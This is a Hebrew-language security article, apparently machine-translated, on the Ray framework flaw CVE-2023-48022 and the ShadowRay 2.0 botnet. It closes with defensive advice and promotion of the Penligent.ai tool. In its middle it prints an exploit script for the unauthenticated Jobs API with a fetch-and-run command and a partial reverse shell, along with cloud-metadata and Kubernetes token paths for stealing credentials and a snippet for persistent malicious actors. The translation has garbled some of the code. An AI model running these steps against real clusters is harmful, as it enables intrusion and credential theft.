השנה היא 2026. תעשיית הבינה המלאכותית התבגרה מצ'אטבוטים ניסיוניים לסוכנים אוטונומיים המנהלים תשתיות קריטיות. עם זאת, בחוות השרתים ובאשכולות Kubernetes של חברות הבינה המלאכותית המתקדמות ביותר בעולם רודף רוח רפאים מהעבר: CVE-2023-48022.

פגיעות קריטית זו (CVSS 9.8) ב- מסגרת Ray—תקן המחשוב המבוזר שבו משתמשים OpenAI, Uber ו-Amazon—היה אמור להיות בעיה שנפתרה. עם זאת, בסוף 2025 התפוצצה ShadowRay 2.0 רשת הבוטים הוכיחה אחרת. עשרות אלפי אשכולות GPU גויסו בשקט לרשתות זומבי, לא רק לצורך כריית מטבעות קריפטוגרפיים, אלא גם לצורך גניבת נתונים מתוחכמת ומתקפות מניעת שירות מבוזרות (DDoS).

עבור מהנדס אבטחת AI מובחר, CVE-2023-48022 אינו רק באג; זהו מקרה בוחן ב "לא בטוח מעצם תכנונו." זה מייצג התנגשות בין תרבות המחקר הפתוחה של פיתוח בינה מלאכותית לבין המציאות העוינת של האינטרנט המודרני. מאמר זה מספק ניתוח פורנזי של הפגיעות, מנתח את הטכניקות המתוחכמות של ShadowRay 2.0 ומסביר מדוע סריקה מסורתית אינה מצליחה להגן על תשתית המחשוב של הבינה המלאכותית.

הארכיטקטורה של "תכונה כנקודת תורפה"

כדי להבין מדוע CVE-2023-48022 מסרב להיעלם, יש להבין את הפילוסופיה של Ray. Ray פותח במטרה לספק מהירות וקלות שימוש ברשתות אינטרא-נט אמינות.

הפגם:

בגרסאות שקדמו להקשחה משמעותית (ובפריסות מודרניות שהוגדרו באופן שגוי), לוח המחוונים Ray Dashboard ו-Jobs API נקשרים כברירת מחדל ל-0.0.0.0:8265 ללא מנגנוני אימות כלשהם.

Anyscale, יוצרי Ray, התנגדו בתחילה להקצאת ה-CVE, בטענה ש-Ray נועד לפעול בתוך גבולות רשת קפדניים. הסתמכות זו על מודל ההגנה "מעטפת חיצונית קשיחה" קרסה כאשר מפתחים החלו לחשוף את לוחות המחוונים של Ray לאינטרנט לצורך ניטור מרחוק, או כאשר תוקפים השתמשו בזיוף בקשות בצד השרת (SSRF) כדי לנוע באופן פנימי.

פירוק משטח התקיפה

הפגיעות מעניקה לתוקף שליטה מלאה על אשכול Ray באמצעות ממשק API HTTP פשוט. אין פגיעה בזיכרון, אין תנאי מירוץ ואין צורך ב-heap feng shui מורכב.

פרימיטיבים של התקפה:

1. נקודת הכניסה: ממשק ה-API של Jobs (/api/jobs/).
2. המנגנון: ה-API מאפשר הגשת קוד Python או פקודות shell שרירותיות לביצוע על צמתים העובדים של האשכול.
3. הפריבילגיה: תהליכי Ray פועלים לעתים קרובות כ שורש בתוך מכולות Docker, או עם תפקידי IAM בעלי הרשאות גבוהות כדי לגשת לדלי S3 המכילים מערכי נתונים.

שידור חוזר טכני: שרשרת ההרג של ShadowRay

בואו נבנה מחדש את לוגיקת הניצול ששימשו בה שחקני ShadowRay 2.0. זה חורג מגבולות הפשטות. תלתל פקודות המראות כיצד הן מתזמרות שליטה מתמשכת.

שלב 1: סיור וטביעת אצבעות

התוקפים סורקים באופן ספציפי את יציאת TCP 8265. הם מזהים את השירות על ידי שאילתה /api/version או לחפש את הכותרת HTML הייחודית של Ray Dashboard.

שלב 2: הנשקה (הגשת משימת Python)

התוקף בונה סקריפט Python המשמש כ"מגיש משימות". סקריפט זה מתקשר עם ה-API של היעד כדי ליצור משימה זדונית.

פייתון

`import requests import json import sys

יעד: אשכול Ray חשוף שנמצא באמצעות Shodan או SSRF

TARGET_IP = "http://target-cluster.ai:8265“

def exploit_cluster(target): url = f”{target}/api/jobs/”

# המטען: סקריפט bash רב-שלבי # 1. התמדה: יצירת משימת cron מוסתרת או שירות systemd # 2. התחמקות: השמדת כורים מתחרים
# 3. חיבור: מעטפת הפוכה ל-C2 entrypoint_cmd = ( "wget -qO-  | bash && " "export OMP_NUM_THREADS=1 && "
    "python3 -c 'import socket,os,pty;s=socket.socket();...'" ) payload = { "entrypoint": entrypoint_cmd, "submission_id": "optimization_task_v4", # הנדסה חברתית: להיראות כמו משימה לגיטימית
    "runtime_env": { "working_dir": "/tmp", "pip": ["requests", "boto3"] # כלים להתקנה מראש לצורך הוצאת מידע },
    "metadata": { "user": "root", "description": "בדיקת תקינות המערכת" } }

נסה: הדפס(f"[*] שליחת מטען ל-{target}...") resp = requests.post(url, json=payload, timeout=10) אם resp.status_code == 200: job_id = resp.json().get('job_id') הדפס(f"[+] ניצול מוצלח. מזהה משימה: {job_id}") print(f"[+] האשכול נמצא כעת בשליטתך.") else: print(f"[-] נכשל: {resp.status_code} - {resp.text}") except Exception as e: print(f"[!] שגיאה: {e}")

אם שם == “ראשי": exploit_cluster(TARGET_IP)`

שלב 3: תנועה לרוחב באמצעות גניבת זהות

ברגע שהקוד מבוצע על צומת העובד, הסקריפט מנצל את שירות מטא-נתונים של מופעים (IMDS) לגנוב אישורי גישה לענן.

• AWS: שאילתה http://169.254.169.254/latest/meta-data/iam/security-credentials/ לגנוב את המפתחות של תפקיד EC2.
• Kubernetes: קרא /var/run/secrets/kubernetes.io/serviceaccount/token.

מכיוון שתפקידי הכשרת בינה מלאכותית דורשים גישה למאגרי נתונים עצומים, אישורים אלה כוללים לעתים קרובות S3FullAccess או הרשאות מקבילות, המאפשרות לתוקף להוציא מודלים קנייניים (בשווי מיליוני דולרים) או לזהם נתוני אימון.

ShadowRay 2.0: התפתחות ההתמדה

הגרסה "2.0" שנצפתה בסוף 2025 הציגה מנגנון התמדה חדשני: שחקנים מנותקים.

ב-Ray, "שחקן" הוא תהליך עבודה בעל מצב. תוקפים פורסים שחקנים זדוניים שנועדו להתנתק ממחזור החיים של המשימה. גם אם צוות האבטחה מבטל את "המשימה" הספציפית המוצגת בלוח המחוונים, תהליך השחקן נשאר פעיל ברקע, צורך משאבים ושומר על קישור C2.

פייתון

`# שחקן זדוני קונספטואלי @ray.remote class ShadowActor: def init(עצמי): self.c2_connection = setup_c2()

def keep_alive(self): while True: # כרייה או הוצאת מידע process_data() time.sleep(1)

פריסה כגורם מנותק – שורד את סיום המשימה

actor = ShadowActor.options(name=”system_optimizer”, lifetime=”detached”).remote()`

הבעיה של "בינה מלאכותית צללים" וכשלים בזיהוי

מדוע ארגונים עם חומות אש יקרות עדיין נפגעים מ-CVE-2023-48022? התשובה טמונה ב שדון AI.

מדעני נתונים ומהנדסי ML לעיתים קרובות עוקפים את בקרות ה-IT כדי להקים אשכולות זמניים לצורך ניסויים. הם משתמשים בסקריפטים של Terraform או בתרשימי Helm שהועתקו מ-GitHub, אשר כברירת מחדל חושפים את לוח המחוונים כדי להקל על איתור באגים. "אשכולות צל" אלה אינם נראים במלאי ה-IT המרכזי ובסורקי פגיעות מסורתיים (הסורקים 192.168.1.0/24 אך החמצת את ה-VPCs הארעיים שנוצרו על ידי מהנדסים).

בנוסף, סורקים מסורתיים בודקים אם גרסאות תוכנה. אם מהנדס מפעיל אשכול Ray באמצעות תמונת Docker ישנה ויציבה יותר (לדוגמה, rayproject/ray:2.8.0) כדי לשכפל מאמר, הוא הופך לפגיע באופן מיידי.

הגנה מבוססת בינה מלאכותית: הגישה של Penligent

ההגנה מפני ShadowRay דורשת יותר מסריקה סטטית; היא דורשת גילוי נכסים דינמי ו ניתוח התנהגותי.

זה המקום שבו Penligent.ai משנה את הגישה ההגנתית לתשתית ה-AI.

1. מיפוי הנכסים הנסתרים

סוכני Penligent משתלבים עם ממשקי API בענן (AWS, Azure, GCP) ועם אשכולות Kubernetes כדי לבצע גילוי נכסים רציף. הם מזהים מופעים מחשוביים המפגינים התנהגות "דמוית Ray" (יציאות פתוחות 8265, 10001, 6379) גם אם הם אינם מתויגים כנכסי ייצור. כך מתגלה פני השטח של "ה-AI הצל".

2. אימות פעיל ובטוח

במקום להסתמך על תפיסת באנרים (שניתן לזייף), Penligent מבצע אימות פעיל בטוח. הוא מנסה לתקשר עם ממשק ה-API של Jobs באמצעות מטען תמים — כגון שליחת משימה שמחושבת בפשטות 1 + 1 או מהדהד מחרוזת אקראית.

• אם הצלחת: הוא מאשר את הסיכון RCE ללא תוצאות חיוביות כוזבות ומתריע מיד ל-SOC.
• בטיחות: בניגוד לתולעת, החקירה של Penligent אינה משנה את מצב המערכת, אינה מתקינה תוכנות מתמשכות ואינה גונבת נתונים.

3. זיהוי חריגות בחתימות מחשוב

Penligent קובעת בסיס ייחוס לעומסי עבודה לגיטימיים של אימונים. לזיהומי ShadowRay יש טביעת אצבע מובהקת:

• רשת: חיבורים יוצאים בלתי צפויים לבריכות כרייה או לכתובות IP לא ידועות (C2).
• חישוב: עליות בשימוש ב-CPU/GPU שאינן תואמות למשימות אימון מתוזמנות.
• תהליך: הטלת ביצים של צדפות יוצאות דופן (/bin/bash, תלתל, wget) מעץ תהליכי העובד של Ray.

אסטרטגיית הגנה לשנת 2026: חיזוק תשתית המחשוב

כדי לחסן את התשתית שלכם מפני CVE-2023-48022 והגרסאות הבאות שלו, יש ליישם את אמצעי הבקרה המחמירים הבאים:

1. רשתות Zero Trust: לעולם אל תחשוף את לוח המחוונים של Ray לאינטרנט הציבורי. הגישה צריכה להיות מתווכת באמצעות Bastion Host מאובטח, VPN או פרוקסי המזהה זהויות (IAP) כמו Cloudflare Access או AWS Verified Access.
2. אכיפת אימות (TLS הדדי): בעוד ש-Ray תומך כעת באימות בסיסי, הסטנדרט המקובל הוא mTLS. קבע את התצורה של Ray כך שידרוש אישורי לקוח עבור כל התקשורת בתוך האשכול ובין הלקוח לשרת.
3. בידוד מרחב שמות: הפעל אשכולות Ray במרחבי שמות Kubernetes ייעודיים עם מדיניות רשת. לדחות את כל התעבורה היוצאת, למעט דליים S3 ורשמי מודלים (Hugging Face) המופיעים ברשימת ההיתרים. לחסום את הגישה ל-IMDS (169.254.169.254).
4. תשתית בלתי משתנה: השתמש במערכות קבצים שורשיות לקריאה בלבד עבור מכולות עובד Ray כדי למנוע מתוקפים להוריד כלים או ליצור התמדה בדיסק.

סיכום

CVE-2023-48022 אינה רק נקודת תורפה; היא סימפטום של הענף הממהר לאמץ את ה-AI על חשבון ארכיטקטורת האבטחה. ככל שאנו מסתמכים יותר על מחשוב מבוזר, "גבול הרשת" כבר אינו מהווה הגנה מספקת.

קמפיין ShadowRay 2.0 מוכיח שתוקפים מחפשים באופן פעיל דלתות פתוחות אלה. מהנדסי אבטחה חייבים לאמץ גישה של "הנחת הפרה", תוך ניצול כלים מבוססי בינה מלאכותית כמו Penligent כדי לגלות, לבדוק ולחזק באופן רציף את נכסי המחשוב שלהם, לפני שהם יהפכו לצומת הבאה ברשת בוטנט זומבית.

הפניות אמינות

• אבטחת Oligo: ShadowRay – קמפיין ההתקפות הראשון על עומסי עבודה מבוסס בינה מלאכותית
• הודעת אבטחה של Anyscale: CVE-2023-48022
• פרטי NIST NVD: CVE-2023-48022
• יחידה 42: דוח איומים בענן – תשתית בינה מלאכותית